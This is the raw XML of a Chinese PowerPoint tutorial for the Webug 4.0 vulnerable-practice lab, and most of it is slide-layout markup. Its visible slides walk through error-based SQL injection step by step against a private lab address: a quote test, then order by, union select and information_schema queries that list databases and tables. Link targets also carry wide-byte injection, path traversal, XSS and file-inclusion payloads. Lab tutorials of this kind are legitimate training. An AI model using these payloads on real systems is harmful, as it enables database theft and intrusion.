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53"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId54"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="265" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="266" r:id="rId5"/>
    <p:sldId id="267" r:id="rId6"/>
    <p:sldId id="276" r:id="rId7"/>
    <p:sldId id="277" r:id="rId8"/>
    <p:sldId id="278" r:id="rId9"/>
    <p:sldId id="268" r:id="rId10"/>
    <p:sldId id="279" r:id="rId11"/>
    <p:sldId id="280" r:id="rId12"/>
    <p:sldId id="281" r:id="rId13"/>
    <p:sldId id="283" r:id="rId14"/>
    <p:sldId id="275" r:id="rId15"/>
    <p:sldId id="282" r:id="rId16"/>
    <p:sldId id="284" r:id="rId17"/>
    <p:sldId id="274" r:id="rId18"/>
    <p:sldId id="285" r:id="rId19"/>
    <p:sldId id="273" r:id="rId20"/>
    <p:sldId id="286" r:id="rId21"/>
    <p:sldId id="272" r:id="rId22"/>
    <p:sldId id="287" r:id="rId23"/>
    <p:sldId id="271" r:id="rId24"/>
    <p:sldId id="320" r:id="rId25"/>
    <p:sldId id="288" r:id="rId26"/>
    <p:sldId id="291" r:id="rId27"/>
    <p:sldId id="269" r:id="rId28"/>
    <p:sldId id="292" r:id="rId29"/>
    <p:sldId id="290" r:id="rId30"/>
    <p:sldId id="289" r:id="rId31"/>
    <p:sldId id="295" r:id="rId32"/>
    <p:sldId id="294" r:id="rId33"/>
    <p:sldId id="297" r:id="rId34"/>
    <p:sldId id="293" r:id="rId35"/>
    <p:sldId id="296" r:id="rId36"/>
    <p:sldId id="307" r:id="rId37"/>
    <p:sldId id="306" r:id="rId38"/>
    <p:sldId id="305" r:id="rId39"/>
    <p:sldId id="304" r:id="rId40"/>
    <p:sldId id="303" r:id="rId41"/>
    <p:sldId id="308" r:id="rId42"/>
    <p:sldId id="309" r:id="rId43"/>
    <p:sldId id="311" r:id="rId44"/>
    <p:sldId id="312" r:id="rId45"/>
    <p:sldId id="313" r:id="rId46"/>
    <p:sldId id="314" r:id="rId47"/>
    <p:sldId id="315" r:id="rId48"/>
    <p:sldId id="316" r:id="rId49"/>
    <p:sldId id="317" r:id="rId50"/>
    <p:sldId id="318" r:id="rId51"/>
    <p:sldId id="319"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0" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="384" y="-90"/>
      </p:cViewPr>
      <p:guideLst/>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="56" d="100"/>
          <a:sy n="56" d="100"/>
        </p:scale>
        <p:origin x="2856"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4B2AE5EB-8F72-406E-9033-EC008D076B20}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2019/9/30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05B36A1-9BF9-4CE2-BA57-54F15440434E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1712123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EE8AFE-C899-4E27-9303-97BCA0D49DA3}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2019/9/30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74C479-F093-42A3-B574-C2B922A7B3ED}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="994764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8932558" y="5870575"/>
            <a:ext cx="1600200" cy="377825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{26DEEBFA-FF2C-4442-B827-54B09B79E4FA}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2019/9/30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962399" y="5870575"/>
            <a:ext cx="4893958" cy="3778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608958"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3352671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2019/9/30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>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1631539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2019/9/30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>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1483223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2019/9/30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>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2628065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2019/9/30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>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1108571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2019/9/30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>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2414946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2019/9/30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>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270260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2019/9/30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>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855725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2019/9/30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>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850471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2019/9/30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>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2086466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2019/9/30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>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1587903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2019/9/30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>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3094317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2019/9/30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>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3241827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2019/9/30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>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1690278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2019/9/30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>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681911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2019/9/30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>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3254225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2019/9/30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>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1915685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1170" y="416689"/>
            <a:ext cx="10131425" cy="1456267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId19"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7165"/>
            <a:ext cx="819048" cy="819048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="887507854"/>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192.168.1.178/control/sqlinject/manifest_error.php?id=1'--" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.178/control/sqlinject/manifest_error.php?id=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192.168.80.136/control/sqlinject/bool_injection.php?id=1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.178/control/sqlinject/bool_injection.php?id=1" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.80.136/control/sqlinject/bool_injection.php?id=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crow_821@163.com&#65292;&#25110;&#32773;&#26159;&#22312;&#24494;&#20449;&#20844;&#20247;&#21495;&#65306;&#20044;&#40486;&#23433;&#20840;"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blog.csdn.net/heiseweiye/article/details/82723478" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/helloc0de/article/details/76180190"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192.168.80.136/control/sqlinject/width_byte_injection.php?id=1%df" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.80.136/control/sqlinject/width_byte_injection.php?id=1"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blog.csdn.net/lvxiangan/article/details/80912870" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cnblogs.com/backlion/p/9302528.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freebuf.com/articles/web/177979.html"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freebuf.com/vuls/195656.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cnblogs.com/Downtime/p/7648182.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192.168.80.136/control/xss/link_xss.php?id=11222" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.80.136/control/xss/link_xss.php?id=1"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cnblogs.com/zhaijiahui/p/8459661.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192.168.80.136/control/filedownload/file_download.php?file=template/../../../boot.ini"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192.168.80.136/control/filedownload/ini_file_download.php?file=template/assets/img/1.txt"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c0ny1/upload-labs" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.jianshu.com/p/5ebba0482980"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wangai3176/webug4.0" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.webug.or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blog.csdn.net/cmzhuang/article/details/53537591"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192.168.80.136/control/auth_cross/cross_permission_pay.php?price=100"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sohu.com/a/322105042_120136504" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:post&#25968;&#25454;&#20013;&#21482;&#26377;username=a@qq.com"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192.168.80.136/control/auth_cross/cross_find2.php?id=1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.80.136/control/auth_cross/cross_find2.php?id=2"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192.168.80.136/control/more/url_redirect.php"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192.168.80.136/control/more/file_include.php?filename=../../../../boot.ini" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.80.136/control/more/file_include.php?filename=../../template/dom_xss.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freebuf.com/articles/web/182280.html"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loud.tencent.com/developer/article/1488183" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cnblogs.com/Rain99-/p/10570809.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345380" y="2456335"/>
            <a:ext cx="7312970" cy="2268158"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t>Webug4.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>基础教程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" cap="none" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>crow</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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9801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6F526B-62CD-4378-8BA6-4ACB6C0005C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416689"/>
            <a:ext cx="10131425" cy="418689"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-01_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>显错注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_01</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF45D059-334D-4C16-8C9D-9166DFC32C09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="248356" y="1061157"/>
            <a:ext cx="11717866" cy="5380154"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://192.168.1.178/control/sqlinject/manifest_error.php?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>打开之后的链接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://192.168.1.178/control/sqlinject/manifest_error.php?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ‘  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发生报错</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.1.178/control/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>sqlinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>manifest_error.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>=1’--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>根据提示，此时我们得到注入点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4. http://192.168.1.178/control/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqlinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>manifest_error.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=1‘ order by 2--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>order by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句得知，一共存在两列。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5. http://192.168.1.178/control/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqlinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>manifest_error.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=1‘ union select 1,2--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>我们发现网页中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>被显示了出来。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>6. http://192.168.1.178/control/sqlinject/manifest_error.php?id=1‘ union select 1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>--+  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>==》information_schema,mysql,performance_schema,test,webug,webug_sys,webug_width_byte</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>7. http://192.168.1.178/control/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqlinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>manifest_error.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=1‘ union select 1, database()--+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查询当前使用的数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>==》</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>webug</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138644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6F526B-62CD-4378-8BA6-4ACB6C0005C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416689"/>
            <a:ext cx="10131425" cy="418689"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-01_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>显错注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_02</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF45D059-334D-4C16-8C9D-9166DFC32C09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="248356" y="1061157"/>
            <a:ext cx="11717866" cy="5380154"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. http://192.168.1.178/control/sqlinject/manifest_error.php?id=1‘ union select 1,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>webug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>‘ --+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查询</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>webug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>库下的所有表：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>==》</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>data_crud,env_list,env_path,flag,sqlinjection,user,user_test</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
